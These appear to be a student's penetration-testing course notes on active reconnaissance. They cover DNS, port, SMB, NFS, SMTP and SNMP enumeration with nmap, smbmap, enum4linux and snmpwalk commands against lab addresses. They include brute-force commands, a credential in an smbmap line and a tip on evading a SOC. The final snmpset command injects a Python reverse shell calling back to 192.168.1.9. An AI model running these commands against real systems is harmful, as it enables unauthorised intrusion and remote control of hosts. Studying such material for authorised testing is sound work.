Module 7 ( Active Info Gathering)

DNS Enumeration

• What is DNS

• interacring with a DNS Tracffic

  • A :

    • Maps a hostname ot an ip , "for worf" lookup/zone

host -t A  grab.com 

• PTR :

  • Maps an ip to a hostname , "reverse" lookup/zone

host -t PTR  52.84.66.32

• CNAME :

  • Maps an alias hostname to an A record hostname

host -t CNAME  52.84.66.32

• MX :

  • contain the names of the servers resposible for handling email for the domain

host -t MX grab.com 

• Brute force Nslookup

  • host -t A <hostname>

  • can see admin.megacorpone.com but I will try to brute force hacktor.megacorpone.com

    

Make Script to brute force sub using bash Script :

 for sub in $(cat /path/to/wordlist/dns.txt);do host -t A $sub.megacorpone.com | grep -v "not found" | grep "mega";done

And can Make Brute Force all (A,AAAA,PTR,MX)

• DNS Zone Transfers

  • Full dump of the zone files.

  • host -i <domain name> <dns server address>

• Automate Tools

  • DNSRecon => dnsrecon -d megacorpone.com -t axfr

  • 

Dnsrecon brute force

• DNSEnum => dnsenum <domain name>

  • 

• Other tools

  • fierce - DNSdumpster - Dnsmap - Metagoofil - foca - maltego - Dmitry - Recon-ng

Port Scanning

• TCP / UDP Scanning

  • TCP

  • UDP

• Three way Handshake

Three way Handshake

Ex :

clint => nc nvlp 1234

Attcker => nc -nvv -w 192.168.1.1 1234-1236

sudo  iptables -nvL

sudo  iptables -z

#rule
#source
sudo iptables -I INPUT 1 -s 192.168.1.8 -j ACCEPT
#clint 
sudo iptables -I OUTPUT 1 -d 192.168.1.8 -j ACCEPT  

• Port Scanning Wth nmap

  • Accountability for Our Traffic

  • TCP Connect Scanning

How check FW With out any Soc team catch U

use sudo command beacuse can change low level Traffic

Ex : sudo nmap 192.168.1.4 -p 25 -sT

-sT => Connect Scanning

-sS => SYN Scanning

-sA => ACK Scanning

-sF => Fen Scanning

UDP Scanning

sudo nmap 192.168.1.4 -sU -p 

Nmap SEN

nmap -sn 192.168.1.1/24 -v 

OS fingerprinting

nmap 192.168.1.4 -O

Banner Grabbing/Service Enumeration

nmap nmap 192.168.1.4 -sV

-sV => Service Scanning

Nmap Scripting Engine (NSE)

sudo nmap --script=/usr/share/nmap/scripts/dns-zone-transfer.nse ns2.megacorpone.com  -p 53

sudo nmap 192.168.1.4 --top-ports=100 -sV -sC 

Masscan

suoo masscan -p80,53 192.168.1.4 --rate=1000 --interface WlanX --router-mac <macaddress>

SMB Enumeration

nbtscan

make scanning to show NetBOIS

sudo nbtscan -r 192.168.1.1/24

How can show file use -v => verbose

sudo nbtscan -r 192.168.1.1/24 -v

smbclinet

With Passweord Protected ON

With Passweord Protected OFF

SMPMAP

smbmap -H 10.10.176.12 -u svc-admin -p management2005

enum4linux

sudo enum4linux 192.168.1.4

Nmap NSE Secipting SMB

sudo nmap 192.168.1.6 -sV -P T:139,445 U:137 --script="smb-enum-*"

sudo nmap  10.10.10.3 -sV -P T:139,445 U:137 --script="smb-vuln-*"

sudo namp  192.168.1.6 -sV -P T:139,445 U:137 --script="dns-nsec-enum.nse" 

NFS Enumeration

RCP Protocol

in first using nmap to scan rpc default run in port 111

nmap 192.168.1.4 -p 111 

OK i will try use NSE rpcinfo

nmap 192.168.1.4 -p 111 --script rpcinfo

RPCINFO Tool

rpcinfo tool use to information about rpc

rpcinfo 192.168.1.4

step 2 using showmount tool

sudo showmount -e 192.168.1.4

all Files and dir can pwd in my machine

to get all info how ?

mkdir /tmp/meta 
sudo service rpcbind start
sudo mount -t nfs 192.168.1.4:/ /tmp/meta/

• SMTP Enumeration

• Scanning for the SMTP Service

  • VRFY Users manual & auto

  • Nmap

  • Metasploit

in first using nmap to scan SMTP default run in port 25

nc -nvv 192.168.1.4 25

smtp-user-enum

smtp-user-enum  -M VRFY -u root -t 192.168.1.4 -w 15

Using NMAP

SNMP Enumeration

• Simple Network Management Protocol

• Management information Baise (MIB) Object identifier (OID)

MIB

To ensure that SNMP access works across manufacturers and with different client-server combinations, the Management Information Base (MIB) was created. MIB is an independent format for storing device information. A MIB is a text file in which all queryable SNMP objects of a device are listed in a standardized tree hierarchy. It contains at least one Object Identifier (OID), which, in addition to the necessary unique address and a name, also provides information about the type, access rights, and a description of the respective object MIB files are written in the Abstract Syntax Notation One (ASN.1) based ASCII text format. The MIBs do not contain data, but they explain where to find which information and what it looks like, which returns values for the specific OID, or which data type is used.

What is OIDs ?

Object Identifiers (OIDs) play a crucial role. These unique identifiers are designed to manage objects within a Management Information Base (MIB).

OID Example

How do you read an OID?

1 . 3 . 6 . 1 . 4 . 1 . 1452 . 1 . 2 . 5 . 1 . 3. 21 . 1 . 4 . 7

Here is a breakdown of this address.

• 1 – this is called the ISO and it establishes that this is an OID. This is why all OIDs start with “1”

• 3 – this is called ORG and it is used to specify the organization that built the device.

• 6 – this is the dod or the Department of Defense which is the organization that established the Internet first.

• 1 – this is the value of the internet to denote that all communications will happen through the Internet.

• 4 – this value determines that this device is made by a private organization, not a government one.

• 1 – this value denotes that an enterprise or a business entity makes the device.

Moving on to the next set of numbers.

• 1452 – gives the name of the organization that manufactured this device.

• 1 – Explain the type of device. In this case, it is an alarm clock.

• 2 – determines that this device is a remote terminal unit.

The rest of the values give specific information about the device.

• 5 – denotes a discrete alarm point.

• 1 – specific point in the device

• 3 – port

• 21 – address of the port

• 1 – display for the port

• 4 – point number

• 7 – state of the point

Basic Information

SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).

Copy

PORT    STATE SERVICE REASON                 VERSION
161/udp open  snmp    udp-response ttl 244   ciscoSystems SNMPv3 server (public)

SNMP also uses port 162/UDP for traps. These are data packets sent from the SNMP server to the client without being explicitly requested.

SNMP Versions

There are 2 important versions of SNMP:

• SNMPv1: Main one, it is still the most frequent, the authentication is based on a string (community string) that travels in plain text (all the information travels in plain text). Version 2 and 2c send the traffic in plain text also and uses a community string as authentication.

• SNMPv3: Uses a better authentication form and the information travels encrypted using (a dictionary attack could be performed but would be much harder to find the correct creds than in SNMPv1 and v2).

step 1

go in windows machine turn on SNMP service Turn on windows Feature

run .\services.msc

sudo nmap  -sU -p 161,162 --script=snmp-* 192.168.1.7

161/udp open | filtered && 162/udp trap open | filtered

ok i will use snmpbulkwalk

snmpbulkwalk -c Public -v2c 192.168.1.7

If you know a valid community string, you can access the data using SNMPWalk or SNMP-Check:

snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot
snmpbulkwalk -c public -v2c 192.168.1.7.

snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP]
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3 #Get IPv6, needed dec2hex
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] NET-SNMP-EXTEND-MIB::nsExtendObjects #get extended
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] .1 #Enum all

snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]

nmap --script "snmp* and not snmp-brute" <target>

braa <community string>@<IP>:.1.3.6.* #Bruteforce specific OID

ex snmp-check

snmp-check 192.168.1.7 -p 161 -c Public 

HackTricks Automatic Commands

Protocol_Name: SNMP    #Protocol Abbreviation if there is one.
Port_Number:  161     #Comma separated if there is more than one.
Protocol_Description: Simple Network Managment Protocol         #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for SNMP
  Note: |
    SNMP - Simple Network Management Protocol is a protocol used to monitor different devices in the network (like routers, switches, printers, IoTs...).

    https://book.hacktricks.xyz/pentesting/pentesting-snmp

Entry_2:
  Name: SNMP Check
  Description: Enumerate SNMP
  Command: snmp-check {IP}

Entry_3:
  Name: OneSixtyOne
  Description: Crack SNMP passwords
  Command: onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt {IP} -w 100

Entry_4:
  Name: Nmap
  Description: Nmap snmp (no brute)
  Command: nmap --script "snmp* and not snmp-brute" {IP}

Entry_5:
  Name: Hydra Brute Force
  Description: Need Nothing
  Command: hydra -P {Big_Passwordlist} -v {IP} snmp
  
  

Running the Injected Commands

snmp-shell

sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt

OR

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 192.168.1.7 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"192.168.1.9\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'